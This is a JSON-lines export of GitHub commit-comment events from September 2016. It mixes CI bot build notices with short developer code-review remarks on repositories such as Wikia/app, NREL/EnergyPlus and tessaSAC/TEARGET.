{"id":"4570095666","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19042556,"position":null,"line":null,"path":null,"commit_id":"d8bbf631214f600da4a043ee51737fa32c7c4f9c","created_at":"2016-09-15T19:08:22Z","updated_at":"2016-09-15T19:08:22Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35481/testReport/) for this commit**"}},"created_at":"2016-09-15T19:08:22Z"}
{"id":"4570097190","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19042560,"position":null,"line":null,"path":null,"commit_id":"9a1a79b93175e4a6d69a6f613675e9bae4e8ddd7","created_at":"2016-09-15T19:08:39Z","updated_at":"2016-09-15T19:08:39Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#c784ok99St2CxxquybYy4w"}},"created_at":"2016-09-15T19:08:39Z"}
{"id":"4570101489","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19042579,"position":null,"line":null,"path":null,"commit_id":"ed4e9d73a7cb97a402afc7e895ef5cf0e27735e4","created_at":"2016-09-15T19:09:28Z","updated_at":"2016-09-15T19:09:28Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35482/testReport/) for this commit**"}},"created_at":"2016-09-15T19:09:28Z"}
{"id":"4570109411","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19042598,"position":null,"line":null,"path":null,"commit_id":"908f1b75243f5a6f92cf374b6eff2a4bb540e450","created_at":"2016-09-15T19:10:59Z","updated_at":"2016-09-15T19:10:59Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-15T19:10:59Z"}
{"id":"4570110751","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/desktop-settings"},"payload":{"comment":{"id":19042603,"position":null,"line":null,"path":null,"commit_id":"a066e1035026b03a314d142492f3d8458a5cd25a","created_at":"2016-09-15T19:11:16Z","updated_at":"2016-09-15T19:11:16Z","body":"The bad news with this is that it works only with **gcc** installed.\r\n```\r\nName            : xorg-xrdb\r\nOptional Deps   : gcc: for preprocessing\r\n```\r\nSeems like really not worth to preinstall **gcc** just for that... @philmmanjaro @udeved \r\nI suggest we just use a shared **.Xresources** file with typical settings for **urxvt** and whatever is needed for the profiles that use one."}},"created_at":"2016-09-15T19:11:16Z"}
{"id":"4570111251","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042606,"position":13,"line":13,"path":"server/app/routes/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:11:21Z","updated_at":"2016-09-15T19:11:21Z","body":"how are you handling the user route ?"}},"created_at":"2016-09-15T19:11:21Z"}
{"id":"4570111310","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.upgrade"},"payload":{"comment":{"id":19042607,"position":null,"line":null,"path":null,"commit_id":"7bdabf31bb3070ab079070aaf0f119c85f49072b","created_at":"2016-09-15T19:11:21Z","updated_at":"2016-09-15T19:11:21Z","body":"Michael Graf your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-15T19:11:21Z"}
{"id":"4570112008","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"Dragas/anko"},"payload":{"comment":{"id":19042611,"position":5,"line":132,"path":"anko/library/static/common/src/Async.kt","commit_id":"9ea41170d0a271bc23d5f3c674ab734c99e2da3b","created_at":"2016-09-15T19:11:28Z","updated_at":"2016-09-15T19:11:28Z","body":"Please fix formatting (spaces around `{` and `}`)."}},"created_at":"2016-09-15T19:11:28Z"}
{"id":"4570114709","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19042616,"position":null,"line":null,"path":null,"commit_id":"908f1b75243f5a6f92cf374b6eff2a4bb540e450","created_at":"2016-09-15T19:11:57Z","updated_at":"2016-09-15T19:11:57Z","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-12: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T19:11:57Z"}
{"id":"4570118872","type":"CommitCommentEvent","actor":{"login":"jeremy-walsh-vgh"},"repo":{"name":"jeremy-walsh-vgh/Autocomplete-Visualforce-Component-V2"},"payload":{"comment":{"id":19042629,"position":null,"line":null,"path":null,"commit_id":"6cd7881a0f30ce5cb8d9c045082ac4521dd6fb43","created_at":"2016-09-15T19:12:44Z","updated_at":"2016-09-15T19:12:44Z","body":"was getting javascript error on Version 52.0.2743.116 m that was preventing select2 from enhancing the search input box"}},"created_at":"2016-09-15T19:12:44Z"}
{"id":"4570122150","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042637,"position":24,"line":24,"path":"server/app/routes/men/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:13:18Z","updated_at":"2016-09-15T19:13:18Z","body":"adding some comments that explain what is the route for would be useful "}},"created_at":"2016-09-15T19:13:18Z"}
{"id":"4570123947","type":"CommitCommentEvent","actor":{"login":"gravityfox"},"repo":{"name":"djxy/PermissionManager-2.0"},"payload":{"comment":{"id":19042641,"position":8,"line":59,"path":"pom.xml","commit_id":"1642acaffe179a05b24683f03a2755e561005827","created_at":"2016-09-15T19:13:39Z","updated_at":"2016-09-15T19:13:39Z","body":"Umm... I think you still need the dependency to compile right...?\r\n\r\nUnless you're doing something else."}},"created_at":"2016-09-15T19:13:39Z"}
{"id":"4570124185","type":"CommitCommentEvent","actor":{"login":"malin1993ml"},"repo":{"name":"cmu-db/peloton"},"payload":{"comment":{"id":19042643,"position":null,"line":null,"path":null,"commit_id":"fef470f55853e0a743f5cb39de82418b049b24fe","created_at":"2016-09-15T19:13:41Z","updated_at":"2016-09-15T19:13:41Z","body":"This is great! Thanks, Joy."}},"created_at":"2016-09-15T19:13:41Z"}
{"id":"4570126175","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19042646,"position":null,"line":null,"path":null,"commit_id":"98ed6daa2dcb8b1f20e87bd607be9de076900a2e","created_at":"2016-09-15T19:14:07Z","updated_at":"2016-09-15T19:14:07Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35483/testReport/) for this commit**"}},"created_at":"2016-09-15T19:14:07Z"}
{"id":"4570127213","type":"CommitCommentEvent","actor":{"login":"malin1993ml"},"repo":{"name":"cmu-db/peloton"},"payload":{"comment":{"id":19042649,"position":7,"line":7,"path":"script/coding_style.md","commit_id":"fef470f55853e0a743f5cb39de82418b049b24fe","created_at":"2016-09-15T19:14:18Z","updated_at":"2016-09-15T19:14:18Z","body":"One minor thing: shouldn't here be 2-column?"}},"created_at":"2016-09-15T19:14:18Z"}
{"id":"4570129560","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/qs"},"payload":{"comment":{"id":19042656,"position":null,"line":null,"path":null,"commit_id":"4e893a27977d25a823881b40d2315c01c3387312","created_at":"2016-09-15T19:14:44Z","updated_at":"2016-09-15T19:14:44Z","body":"/cc @jcredding "}},"created_at":"2016-09-15T19:14:44Z"}
{"id":"4570132224","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042660,"position":15,"line":15,"path":"server/app/routes/tears/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:15:16Z","updated_at":"2016-09-15T19:15:16Z","body":"To make the code more DRY I would do this:\r\n```js\r\nrouter.param('id', function (req, res, next, id) {\r\n    Tear.findById(id)\r\n        .then(function (user) {\r\n            if (!tear) res.status(404).send();\r\n            req.tearById = tear;\r\n            next();\r\n        })\r\n        .catch(next);\r\n});\r\n\r\n```"}},"created_at":"2016-09-15T19:15:16Z"}
{"id":"4570136928","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042673,"position":15,"line":15,"path":"server/app/routes/tears/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:16:10Z","updated_at":"2016-09-15T19:16:10Z","body":"Then use like:\r\n```js\r\nrouter.get('/:id', function(req, res, next) {\r\n  res.send(req.tearById);\r\n}\r\n```"}},"created_at":"2016-09-15T19:16:10Z"}
{"id":"4570142669","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19042686,"position":null,"line":null,"path":null,"commit_id":"908f1b75243f5a6f92cf374b6eff2a4bb540e450","created_at":"2016-09-15T19:17:17Z","updated_at":"2016-09-15T19:17:17Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1781 of 1781 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T19:17:17Z"}
{"id":"4570143823","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19042689,"position":null,"line":null,"path":null,"commit_id":"9eb109ac9f1dd717116f3c68fa6ca1b512185bdb","created_at":"2016-09-15T19:17:30Z","updated_at":"2016-09-15T19:17:30Z","body":"Lgtm"}},"created_at":"2016-09-15T19:17:30Z"}
{"id":"4570145250","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19042697,"position":null,"line":null,"path":null,"commit_id":"7ff34451bdd3addbb38b3c95cb8df61965c41ca2","created_at":"2016-09-15T19:17:46Z","updated_at":"2016-09-15T19:17:46Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35484/testReport/) for this commit**"}},"created_at":"2016-09-15T19:17:46Z"}
{"id":"4570145569","type":"CommitCommentEvent","actor":{"login":"c-rack"},"repo":{"name":"mootpointer/quantum-elixir"},"payload":{"comment":{"id":19042698,"position":null,"line":null,"path":null,"commit_id":"922514f0cfcc1eaa8b3ffeb08fbb4aa734a16675","created_at":"2016-09-15T19:17:50Z","updated_at":"2016-09-15T19:17:50Z","body":"@mootpointer would you mind to send a pull request?"}},"created_at":"2016-09-15T19:17:50Z"}
{"id":"4570148948","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19042710,"position":null,"line":null,"path":null,"commit_id":"908f1b75243f5a6f92cf374b6eff2a4bb540e450","created_at":"2016-09-15T19:18:25Z","updated_at":"2016-09-15T19:18:25Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T19:18:25Z"}
{"id":"4570149937","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042712,"position":24,"line":24,"path":"server/app/routes/tears/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:18:36Z","updated_at":"2016-09-15T19:18:36Z","body":"you may have problems with those two routes. Express does not differentiate between /:state and /:organic.\r\nyou could have named the routes like: byState/:state and byOrganic/:organic.  "}},"created_at":"2016-09-15T19:18:36Z"}
{"id":"4570152572","type":"CommitCommentEvent","actor":{"login":"h0tbird"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19042725,"position":54,"line":54,"path":"hack/make-rules/helpers/cache_go_dirs.sh","commit_id":"665966746912ea28b5511f55b75540187a4ef907","created_at":"2016-09-15T19:19:05Z","updated_at":"2016-09-15T19:19:05Z","body":"I understand, thanks anyway."}},"created_at":"2016-09-15T19:19:05Z"}
{"id":"4570152701","type":"CommitCommentEvent","actor":{"login":"sjayanna"},"repo":{"name":"jimweirich/wyriki"},"payload":{"comment":{"id":19042726,"position":null,"line":null,"path":null,"commit_id":"d28fac7f18aeacb00d8ad3460a0a5a901617c2d4","created_at":"2016-09-15T19:19:08Z","updated_at":"2016-09-15T19:19:08Z","body":"RIP Jim"}},"created_at":"2016-09-15T19:19:08Z"}
{"id":"4570152854","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042727,"position":34,"line":34,"path":"server/app/routes/tears/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:19:10Z","updated_at":"2016-09-15T19:19:10Z","body":" Tear.findAll({where: {organic: request.params.state}})\r\nshould be \r\n Tear.findAll({where: {organic: request.params.organic}})"}},"created_at":"2016-09-15T19:19:10Z"}
{"id":"4570154071","type":"CommitCommentEvent","actor":{"login":"c-rack"},"repo":{"name":"mootpointer/quantum-elixir"},"payload":{"comment":{"id":19042729,"position":null,"line":null,"path":null,"commit_id":"922514f0cfcc1eaa8b3ffeb08fbb4aa734a16675","created_at":"2016-09-15T19:19:23Z","updated_at":"2016-09-15T19:19:23Z","body":"@mootpointer sorry, my fault, we use timex 3.0 in current version... :-)"}},"created_at":"2016-09-15T19:19:23Z"}
{"id":"4570154615","type":"CommitCommentEvent","actor":{"login":"Mabusto"},"repo":{"name":"MindscapeHQ/raygun4js"},"payload":{"comment":{"id":19042731,"position":null,"line":null,"path":null,"commit_id":"186ae91a5a5e387ca201c81445f38eecefb06f71","created_at":"2016-09-15T19:19:29Z","updated_at":"2016-09-15T19:19:29Z","body":"This currently breaks on latest Chrome.\r\n\r\nex.stacktrace is undefined.\r\n\r\n`lines = stacktrace !== null ? stacktrace.split('\\n') : stacktrace`\r\n\r\nwill then run stacktrace.split() which crashes.\r\n\r\nEven if you fix that\r\n\r\n`for (var i = 0, j = lines.length; i < j; i += 2) {`\r\n\r\ndoesn't account for lines being null, which was the original purpose of this commit (guard against stacktrace being null)."}},"created_at":"2016-09-15T19:19:29Z"}
{"id":"4570156052","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19042746,"position":27,"line":484,"path":"api/easyrtc_int.js","commit_id":"7f07d6975a32d3fbd193b9e4c1b9e0ddec11274a","created_at":"2016-09-15T19:19:46Z","updated_at":"2016-09-15T19:19:46Z","body":"I don't see where outputSelector is coming from @ericDavis"}},"created_at":"2016-09-15T19:19:46Z"}
{"id":"4570161768","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042792,"position":7,"line":7,"path":"server/app/routes/users/cartRouter.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:20:51Z","updated_at":"2016-09-15T19:20:51Z","body":"What is this line for ? "}},"created_at":"2016-09-15T19:20:51Z"}
{"id":"4570163042","type":"CommitCommentEvent","actor":{"login":"lanepeeler"},"repo":{"name":"lanepeeler/halloweenstore"},"payload":{"comment":{"id":19042798,"position":null,"line":null,"path":null,"commit_id":"0fb5200d53bf012fef0c6fce0187307010ee7e6c","created_at":"2016-09-15T19:21:08Z","updated_at":"2016-09-15T19:21:08Z","body":"Also most of the changes to index.html are fixing the 4-space indents to 2 spaces."}},"created_at":"2016-09-15T19:21:08Z"}
{"id":"4570166938","type":"CommitCommentEvent","actor":{"login":"FofonRed"},"repo":{"name":"FofonRed/Tutorial"},"payload":{"comment":{"id":19042819,"position":null,"line":null,"path":null,"commit_id":"675a69f9848621b16e4070f3ed2f6b3accbb9cf7","created_at":"2016-09-15T19:21:52Z","updated_at":"2016-09-15T19:21:52Z","body":"sdfsdf"}},"created_at":"2016-09-15T19:21:52Z"}
{"id":"4570167027","type":"CommitCommentEvent","actor":{"login":"moe45673"},"repo":{"name":"moe45673/ZaveDevelopment"},"payload":{"comment":{"id":19042820,"position":null,"line":null,"path":null,"commit_id":"f8edf1fef66aa96cd1ac2009fd605714bde8d255","created_at":"2016-09-15T19:21:53Z","updated_at":"2016-09-15T19:21:53Z","body":"closes #4 "}},"created_at":"2016-09-15T19:21:53Z"}
{"id":"4570168302","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042826,"position":28,"line":28,"path":"server/app/routes/users/cartRouter.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:22:07Z","updated_at":"2016-09-15T19:22:07Z","body":"would be nice to use .catch(next) to handle the errors and send them to the stack trace"}},"created_at":"2016-09-15T19:22:07Z"}
{"id":"4570171171","type":"CommitCommentEvent","actor":{"login":"pembodoctorsmedicalclinic"},"repo":{"name":"pembodoctorsmedicalclinic/pembodoctorsmedicalclinic.github.io"},"payload":{"comment":{"id":19042831,"position":null,"line":null,"path":null,"commit_id":"ce7ef158769bb6a0f732d33a423264058c01d6b8","created_at":"2016-09-15T19:22:39Z","updated_at":"2016-09-15T19:22:39Z","body":"Noted."}},"created_at":"2016-09-15T19:22:39Z"}
{"id":"4570171916","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19042834,"position":null,"line":null,"path":null,"commit_id":"704a96e2d7cec9b51cf3564e5ed9af1e16f89591","created_at":"2016-09-15T19:22:48Z","updated_at":"2016-09-15T19:22:48Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35485/testReport/) for this commit**"}},"created_at":"2016-09-15T19:22:48Z"}
{"id":"4570172087","type":"CommitCommentEvent","actor":{"login":"kellytech"},"repo":{"name":"kellytech/codedeploysample"},"payload":{"comment":{"id":19042835,"position":null,"line":null,"path":null,"commit_id":"a730c83faf26f373d73b4638f95abd9fca2b5da4","created_at":"2016-09-15T19:22:50Z","updated_at":"2016-09-15T19:22:50Z","body":"jo jp"}},"created_at":"2016-09-15T19:22:50Z"}
{"id":"4570175256","type":"CommitCommentEvent","actor":{"login":"efimovgk"},"repo":{"name":"efimovgk/machine-learning"},"payload":{"comment":{"id":19042844,"position":null,"line":null,"path":null,"commit_id":"0679b1862e59002bf0f558e63e6d8c12296285b3","created_at":"2016-09-15T19:23:25Z","updated_at":"2016-09-15T19:23:25Z","body":"1st version of left statement - indicates oncoming only"}},"created_at":"2016-09-15T19:23:25Z"}
{"id":"4570176398","type":"CommitCommentEvent","actor":{"login":"mortezadvnv"},"repo":{"name":"mortezadvnv/bot"},"payload":{"comment":{"id":19042849,"position":4,"line":242,"path":"bot/sbssbot.lua","commit_id":"47373a6ef2bd41ddd41119ee3ce20e42fba703dd","created_at":"2016-09-15T19:23:38Z","updated_at":"2016-09-15T19:23:38Z","body":"208560168"}},"created_at":"2016-09-15T19:23:38Z"}
{"id":"4570178713","type":"CommitCommentEvent","actor":{"login":"moe45673"},"repo":{"name":"moe45673/ZaveDevelopment"},"payload":{"comment":{"id":19042857,"position":null,"line":null,"path":null,"commit_id":"45df82a160d89eef05b247febc8217cbf86aff1e","created_at":"2016-09-15T19:24:04Z","updated_at":"2016-09-15T19:24:04Z","body":"Fixes #1 "}},"created_at":"2016-09-15T19:24:04Z"}
{"id":"4570180714","type":"CommitCommentEvent","actor":{"login":"efimovgk"},"repo":{"name":"efimovgk/machine-learning"},"payload":{"comment":{"id":19042861,"position":null,"line":null,"path":null,"commit_id":"48faf2e7e2a110c8b71d3080f9e6289e5710c09c","created_at":"2016-09-15T19:24:26Z","updated_at":"2016-09-15T19:24:26Z","body":"indicates turning left and got oncoming traffic from left"}},"created_at":"2016-09-15T19:24:26Z"}
{"id":"4570180745","type":"CommitCommentEvent","actor":{"login":"mortezadvnv"},"repo":{"name":"mortezadvnv/bot"},"payload":{"comment":{"id":19042862,"position":5,"line":242,"path":"bot/sbssbot.lua","commit_id":"47373a6ef2bd41ddd41119ee3ce20e42fba703dd","created_at":"2016-09-15T19:24:26Z","updated_at":"2016-09-15T19:24:26Z","body":":208560168"}},"created_at":"2016-09-15T19:24:26Z"}
{"id":"4570181379","type":"CommitCommentEvent","actor":{"login":"mattdangerw"},"repo":{"name":"endlessm/eos-knowledge-lib"},"payload":{"comment":{"id":19042864,"position":40,"line":348,"path":"js/app/interfaces/card.js","commit_id":"3d4d13c522592312c8954c2b3b506b7ec0d60336","created_at":"2016-09-15T19:24:33Z","updated_at":"2016-09-15T19:24:33Z","body":"@tchx84 this was the problem line I think. This set up the `update_highlight` function to be called anytime the style context changes, and the function would continue to be called even after a new call to `set_label_with_highlight` was made. So you would accumulate `update_highlight` calls with old `regex`s for old highlight strings.\r\n\r\nSo specifically for this bug\r\n```\r\nif (this.highlight_string.length === 0) {\r\n    label.label = title;\r\n    return;\r\n}\r\n```\r\nis run, highlight is replaced, bu then style context changes, old `update_highlight` is run and the highlight comes back.\r\n\r\nConvoluted and weird enough that this refactor seemed in order.\r\n\r\nBroader level, its kinda weird and unmodular that only two of our 10+ cards support highlight strings. And tying things directly to the query in our history store could easily fall down with different user experience. Better might be to have a way to universally support highlight on cards, and tie the highlight string directly to the query of the card's content group's selection. But that was well beyond what I was willing to do for a last minute 3.0.3 change."}},"created_at":"2016-09-15T19:24:33Z"}
{"id":"4570182396","type":"CommitCommentEvent","actor":{"login":"lolleko"},"repo":{"name":"Java-Lib/guesswho"},"payload":{"comment":{"id":19042867,"position":null,"line":null,"path":null,"commit_id":"d19ef6e390430dbaf42e66c76fe94c8ebdb05514","created_at":"2016-09-15T19:24:44Z","updated_at":"2016-09-15T19:24:44Z","body":"Does this fit inside the box at the top? If so i will update it on master aswell."}},"created_at":"2016-09-15T19:24:44Z"}
{"id":"4570182551","type":"CommitCommentEvent","actor":{"login":"w0rp"},"repo":{"name":"ynonp/ale"},"payload":{"comment":{"id":19042868,"position":null,"line":null,"path":null,"commit_id":"6d0d05410a3406a773219b9d487b902b548e6cb1","created_at":"2016-09-15T19:24:46Z","updated_at":"2016-09-15T19:24:46Z","body":"This looks cool to me. :+1: Shall I get this merged into upstream? I have some changes to the API I just pushed up.\r\n\r\nI need to start writing the doc files to explain the API. I have been experiencing some wrist pain recently, so it might take me a few days before I add that."}},"created_at":"2016-09-15T19:24:46Z"}
{"id":"4570184557","type":"CommitCommentEvent","actor":{"login":"mortezadvnv"},"repo":{"name":"mortezadvnv/bot"},"payload":{"comment":{"id":19042876,"position":5,"line":242,"path":"bot/sbssbot.lua","commit_id":"47373a6ef2bd41ddd41119ee3ce20e42fba703dd","created_at":"2016-09-15T19:25:11Z","updated_at":"2016-09-15T19:25:11Z","body":"208560168"}},"created_at":"2016-09-15T19:25:11Z"}
{"id":"4570186367","type":"CommitCommentEvent","actor":{"login":"vxbinaca"},"repo":{"name":"bibanon/tubeup"},"payload":{"comment":{"id":19042881,"position":null,"line":null,"path":null,"commit_id":"953db23e77a1ec6c393be9c2430d6e17da0f8891","created_at":"2016-09-15T19:25:29Z","updated_at":"2016-09-15T19:25:29Z","body":"@jjjake It will be implemented when a new tag is created, and that's after theres another major change. I had to revert to your last commit (erasing some of my own) because a tabbing consistence issue crept in, and all the IF statements for audio sites apparently wanted THEN for each. I just reverted to your 0.0.2 commit and stopped playing with it.\r\n\r\nIt's my understanding that the admins want to move away from python2, however this is a good idea simply for comparability, it hurts nothing and requires no changes to the script and transparently works."}},"created_at":"2016-09-15T19:25:29Z"}
{"id":"4570187260","type":"CommitCommentEvent","actor":{"login":"iurii-kyrylenko"},"repo":{"name":"iurii-kyrylenko/angular2-webpack"},"payload":{"comment":{"id":19042882,"position":20,"line":13,"path":"src/app/app.routing.ts","commit_id":"84a3c94e87de1cd30ac94a30f5c998c3bd7515d7","created_at":"2016-09-15T19:25:38Z","updated_at":"2016-09-15T19:25:38Z","body":"Just to make Typescript not to complain )\r\n`require` is a var of the `NodeRequire` type (declared in `node/index.d.ts`). Unfortunately, `NodeRequire` doesn't declares the `ensure` function:\r\n```\r\ninterface NodeRequire extends NodeRequireFunction {\r\n    resolve(id: string): string;\r\n    cache: any;\r\n    extensions: any;\r\n    main: any;\r\n}\r\n```"}},"created_at":"2016-09-15T19:25:38Z"}
{"id":"4570189706","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19042886,"position":37,"line":37,"path":"tests/server/routes/men-test.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:26:08Z","updated_at":"2016-09-15T19:26:08Z","body":"You don't need to both `return` a promise AND use a `done` function in Mocha — that's known as over-specifying the test. Choose one or the other."}},"created_at":"2016-09-15T19:26:08Z"}
{"id":"4570190620","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":19042887,"position":70,"line":69,"path":"api/dao.js","commit_id":"8f02a8f3a2535a65fc57cd1a78cb61bd120a6026","created_at":"2016-09-15T19:26:17Z","updated_at":"2016-09-15T19:26:17Z","body":"если это поиск по id, то почему просто не проверять как obj.id == userId ? \r\n"}},"created_at":"2016-09-15T19:26:17Z"}
{"id":"4570192593","type":"CommitCommentEvent","actor":{"login":"kayeouh"},"repo":{"name":"kayeouh/postcss-extend"},"payload":{"comment":{"id":19042891,"position":null,"line":null,"path":null,"commit_id":"4952211d1ed3b74108a26102e54c20c1c520d151","created_at":"2016-09-15T19:26:40Z","updated_at":"2016-09-15T19:26:40Z","body":"Previous version was adding unwanted \"undefined\" text to outputted CSS. Adding a check to see whether the node raws to be copied have the \"before,\" \"after,\" and \"between\" properties; if not, they won't be set on the cloned node"}},"created_at":"2016-09-15T19:26:40Z"}
{"id":"4570192966","type":"CommitCommentEvent","actor":{"login":"mdonald"},"repo":{"name":"mdonald/AGHY_SFAEF_Project"},"payload":{"comment":{"id":19042892,"position":null,"line":null,"path":null,"commit_id":"c042c684da139150110010a1cc956f19c9e9d1dd","created_at":"2016-09-15T19:26:44Z","updated_at":"2016-09-15T19:26:44Z","body":"Thanks!"}},"created_at":"2016-09-15T19:26:44Z"}
{"id":"4570195787","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":19042904,"position":144,"line":128,"path":"api/dao.js","commit_id":"8f02a8f3a2535a65fc57cd1a78cb61bd120a6026","created_at":"2016-09-15T19:27:17Z","updated_at":"2016-09-15T19:27:17Z","body":"тут нужно подумать в каких ситуациях коллбек не будет вызван и к чему это может привести?"}},"created_at":"2016-09-15T19:27:17Z"}
